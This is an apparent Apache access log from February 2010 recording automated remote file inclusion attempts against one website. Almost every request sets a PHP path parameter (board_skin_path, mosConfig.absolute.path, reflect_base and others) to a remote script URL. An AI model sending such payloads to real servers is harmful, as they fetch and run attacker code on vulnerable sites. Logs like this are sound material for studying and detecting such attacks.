121.88.4.141 - - [08/Feb/2010:05:40:17 -0800] "GET /index.php?option=com_frontpage&Itemid=1//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:40:19 -0800] "GET /logs/access_100125.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:40:32 -0800] "GET /bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:40:32 -0800] "GET /logs/access_100126.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:40:32 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.190.61 - - [08/Feb/2010:05:40:32 -0800] "GET /logs/access_100202.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:41:14 -0800] "GET /logs/access_100125.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:41:24 -0800] "GET /logs/access_100202.log%20%20//delete_comment.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:41:24 -0800] "GET /delete_comment.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:41:24 -0800] "GET /logs//delete_comment.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:42:11 -0800] "GET /logs/access_100130.log%20%20//delete_comment.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [08/Feb/2010:05:43:28 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [08/Feb/2010:05:43:28 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [08/Feb/2010:05:43:28 -0800] "GET /logs/access_100106.log/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [08/Feb/2010:05:43:55 -0800] "GET /component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
110.45.146.189 - - [08/Feb/2010:05:43:55 -0800] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:44:00 -0800] "GET /logs//mail.inc.php?skin_board_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:44:00 -0800] "GET /logs/access_100112.log%20%20//mail.inc.php?skin_board_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:44:00 -0800] "GET /mail.inc.php?skin_board_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [08/Feb/2010:05:44:15 -0800] "GET /logs/access_100120.log/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:44:26 -0800] "GET /delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:44:26 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:44:27 -0800] "GET /logs/access_100108.log//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:44:36 -0800] "GET /logs/access_100112.log%20%20//mail.inc.php?skin_board_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:44:36 -0800] "GET /mail.inc.php?skin_board_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:44:36 -0800] "GET /logs//mail.inc.php?skin_board_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:45:21 -0800] "GET /logs/access_100202.log%20%20//delete_comment.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:45:21 -0800] "GET /logs//delete_comment.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:45:21 -0800] "GET /delete_comment.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:05:45:23 -0800] "GET /logs/access_100126.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:05:45:28 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
117.74.98.18 - - [08/Feb/2010:05:46:19 -0800] "GET /logs/access_100123.log/?sourcedir=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
117.74.98.18 - - [08/Feb/2010:05:46:20 -0800] "GET /logs/?sourcedir=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:05:46:20 -0800] "GET /logs/access_100126.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:05:46:20 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
117.74.98.18 - - [08/Feb/2010:05:46:20 -0800] "GET /?sourcedir=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:05:46:23 -0800] "GET /bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:05:46:29 -0800] "GET //appserv/main.php?appserv_root=? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:05:46:31 -0800] "GET /logs/access_100130.log%20%20//delete_comment.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:05:46:41 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.190.61 - - [08/Feb/2010:05:46:42 -0800] "GET /logs/access_100108.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:46:47 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:46:47 -0800] "GET /logs/access.log//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:46:50 -0800] "GET /bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:05:47:18 -0800] "GET /logs/access_100125.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:05:47:20 -0800] "GET /bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:47:25 -0800] "GET /logs/access_100119.log//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:05:47:35 -0800] "GET /logs/access.log//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:05:48:00 -0800] "GET /logs/access_100119.log//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:48:02 -0800] "GET /delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:48:02 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:48:03 -0800] "GET /logs/access_100108.log//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:48:15 -0800] "GET /bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:48:15 -0800] "GET /logs/access.log//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:48:15 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
117.74.98.18 - - [08/Feb/2010:05:48:24 -0800] "GET /logs/access_100201.log/?sourcedir=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:05:48:39 -0800] "GET /logs/access_100125.log//bbs//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:05:48:51 -0800] "GET /logs/access_100119.log//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [08/Feb/2010:05:49:57 -0800] "GET /logs//delete_comment.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [08/Feb/2010:05:49:57 -0800] "GET /delete_comment.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [08/Feb/2010:05:49:57 -0800] "GET /logs/access_100202.log//delete_comment.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:05:49:59 -0800] "GET //appserv/main.php?appserv_root=? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:49:59 -0800] "GET /logs/access_100115.log//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:05:50:33 -0800] "GET /logs/access_100129.log//delete_all.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:05:50:33 -0800] "GET /delete_all.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:05:50:33 -0800] "GET /logs//delete_all.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:05:50:38 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:05:50:40 -0800] "GET /logs/access_100129.log//delete_all.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:05:50:40 -0800] "GET /logs//delete_all.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:05:50:41 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:05:50:41 -0800] "GET /delete_all.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:50:51 -0800] "GET /logs/access_100103.log//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:50:52 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [08/Feb/2010:05:50:54 -0800] "GET /logs/access_100130.log//delete_comment.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.190.61 - - [08/Feb/2010:05:50:56 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.190.61 - - [08/Feb/2010:05:50:56 -0800] "GET /logs/access_100202.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:51:33 -0800] "GET /logs/access_100129.log/index.php?sayfa=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:51:33 -0800] "GET /logs/index.php?sayfa=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:51:33 -0800] "GET /index.php?sayfa=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:55:55 -0800] "GET /logs/access_100108.log%20%20//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:55:55 -0800] "GET /delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:55:55 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:56:14 -0800] "GET /logs/index.php?sayfa=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:56:14 -0800] "GET /logs/access_100117.log%20%20/index.php?sayfa=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:05:56:15 -0800] "GET /index.php?sayfa=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:56:19 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:56:20 -0800] "GET /logs/access_100103.log//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:05:56:33 -0800] "GET /bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:05:56:33 -0800] "GET /logs/access.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:05:56:39 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:05:56:54 -0800] "GET /logs/access_100119.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:58:31 -0800] "GET /logs/access_100103.log//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:58:32 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:05:58:34 -0800] "GET /logs/access_100116.log%20%20/bad_link.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:05:58:34 -0800] "GET /bad_link.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:05:58:34 -0800] "GET /logs/access_100116.log%20%20/bad_link.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:05:58:34 -0800] "GET /logs/bad_link.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:05:58:34 -0800] "GET /bad_link.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:05:58:34 -0800] "GET /logs/bad_link.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:05:58:41 -0800] "GET /logs/access_100103.log%20%20/bad_link.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:05:58:41 -0800] "GET /logs/access_100103.log%20%20/bad_link.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.188.252.55 - - [08/Feb/2010:05:59:28 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.188.252.55 - - [08/Feb/2010:05:59:28 -0800] "GET /logs/access_100130.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.188.252.55 - - [08/Feb/2010:05:59:28 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.188.252.55 - - [08/Feb/2010:06:00:27 -0800] "GET /logs/access_100202.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:06:01:32 -0800] "GET /logs/access_100129.log%20%20/index.php?sayfa=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.232.161.146 - - [08/Feb/2010:06:01:35 -0800] "GET //components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://luphuntara.darmajaya.ac.id/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:06:02:23 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:06:02:23 -0800] "GET /logs/access_100122.log//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:06:02:23 -0800] "GET /delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:06:02:56 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:06:02:56 -0800] "GET /delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:06:02:57 -0800] "GET /logs/access_100122.log//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:03:19 -0800] "GET /skin/happycast/view.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:03:19 -0800] "GET /logs/access_100117.log%20%20//skin/happycast/view.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:03:19 -0800] "GET /logs//skin/happycast/view.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:06:03:31 -0800] "GET /logs/access_100108.log//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:03:37 -0800] "GET /logs//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:03:37 -0800] "GET /popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:03:37 -0800] "GET /logs/access_100115.log%20%20//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:03:41 -0800] "GET /logs/access.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:03:41 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:03:41 -0800] "GET /bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:06:03:41 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:06:03:41 -0800] "GET /write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
